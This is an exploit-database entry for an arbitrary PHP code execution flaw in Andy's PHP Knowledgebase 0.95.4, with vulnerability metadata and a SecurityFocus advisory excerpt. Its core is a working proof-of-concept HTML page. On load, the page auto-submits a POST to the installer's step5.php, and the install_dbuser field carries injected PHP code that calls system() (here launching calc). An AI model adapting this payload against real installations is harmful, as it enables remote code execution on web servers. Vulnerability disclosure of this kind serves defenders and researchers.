header-logo
Suggest Exploit
vendor:
Andy's PHP Knowledgebase
by:
Unknown
7.5
CVSS
HIGH
Arbitrary Code Execution
CWE
Product Name: Andy's PHP Knowledgebase
Affected Version From: 0.95.4
Affected Version To: 0.95.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Arbitrary Code Execution in Andy’s PHP Knowledgebase

The vulnerability allows remote attackers to execute arbitrary PHP code by exploiting the application's failure to sanitize user-supplied input. By submitting a specially crafted input, attackers can execute arbitrary code within the context of the affected webserver process.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47918/info

Andy's PHP Knowledgebase is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.

Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.

Andy's PHP Knowledgebase 0.95.4 is vulnerable; other versions may also be affected. 

<html>
    <body onload="document.forms[0].submit()"> 
        <form method="POST" action="http://localhost/aphpkb/install/step5.php">  
            <input type="hidden" name="install_dbuser" value="');system('calc');//" />   
            <input type="submit" name="submit" />   
        </form>   
    </body>
</html>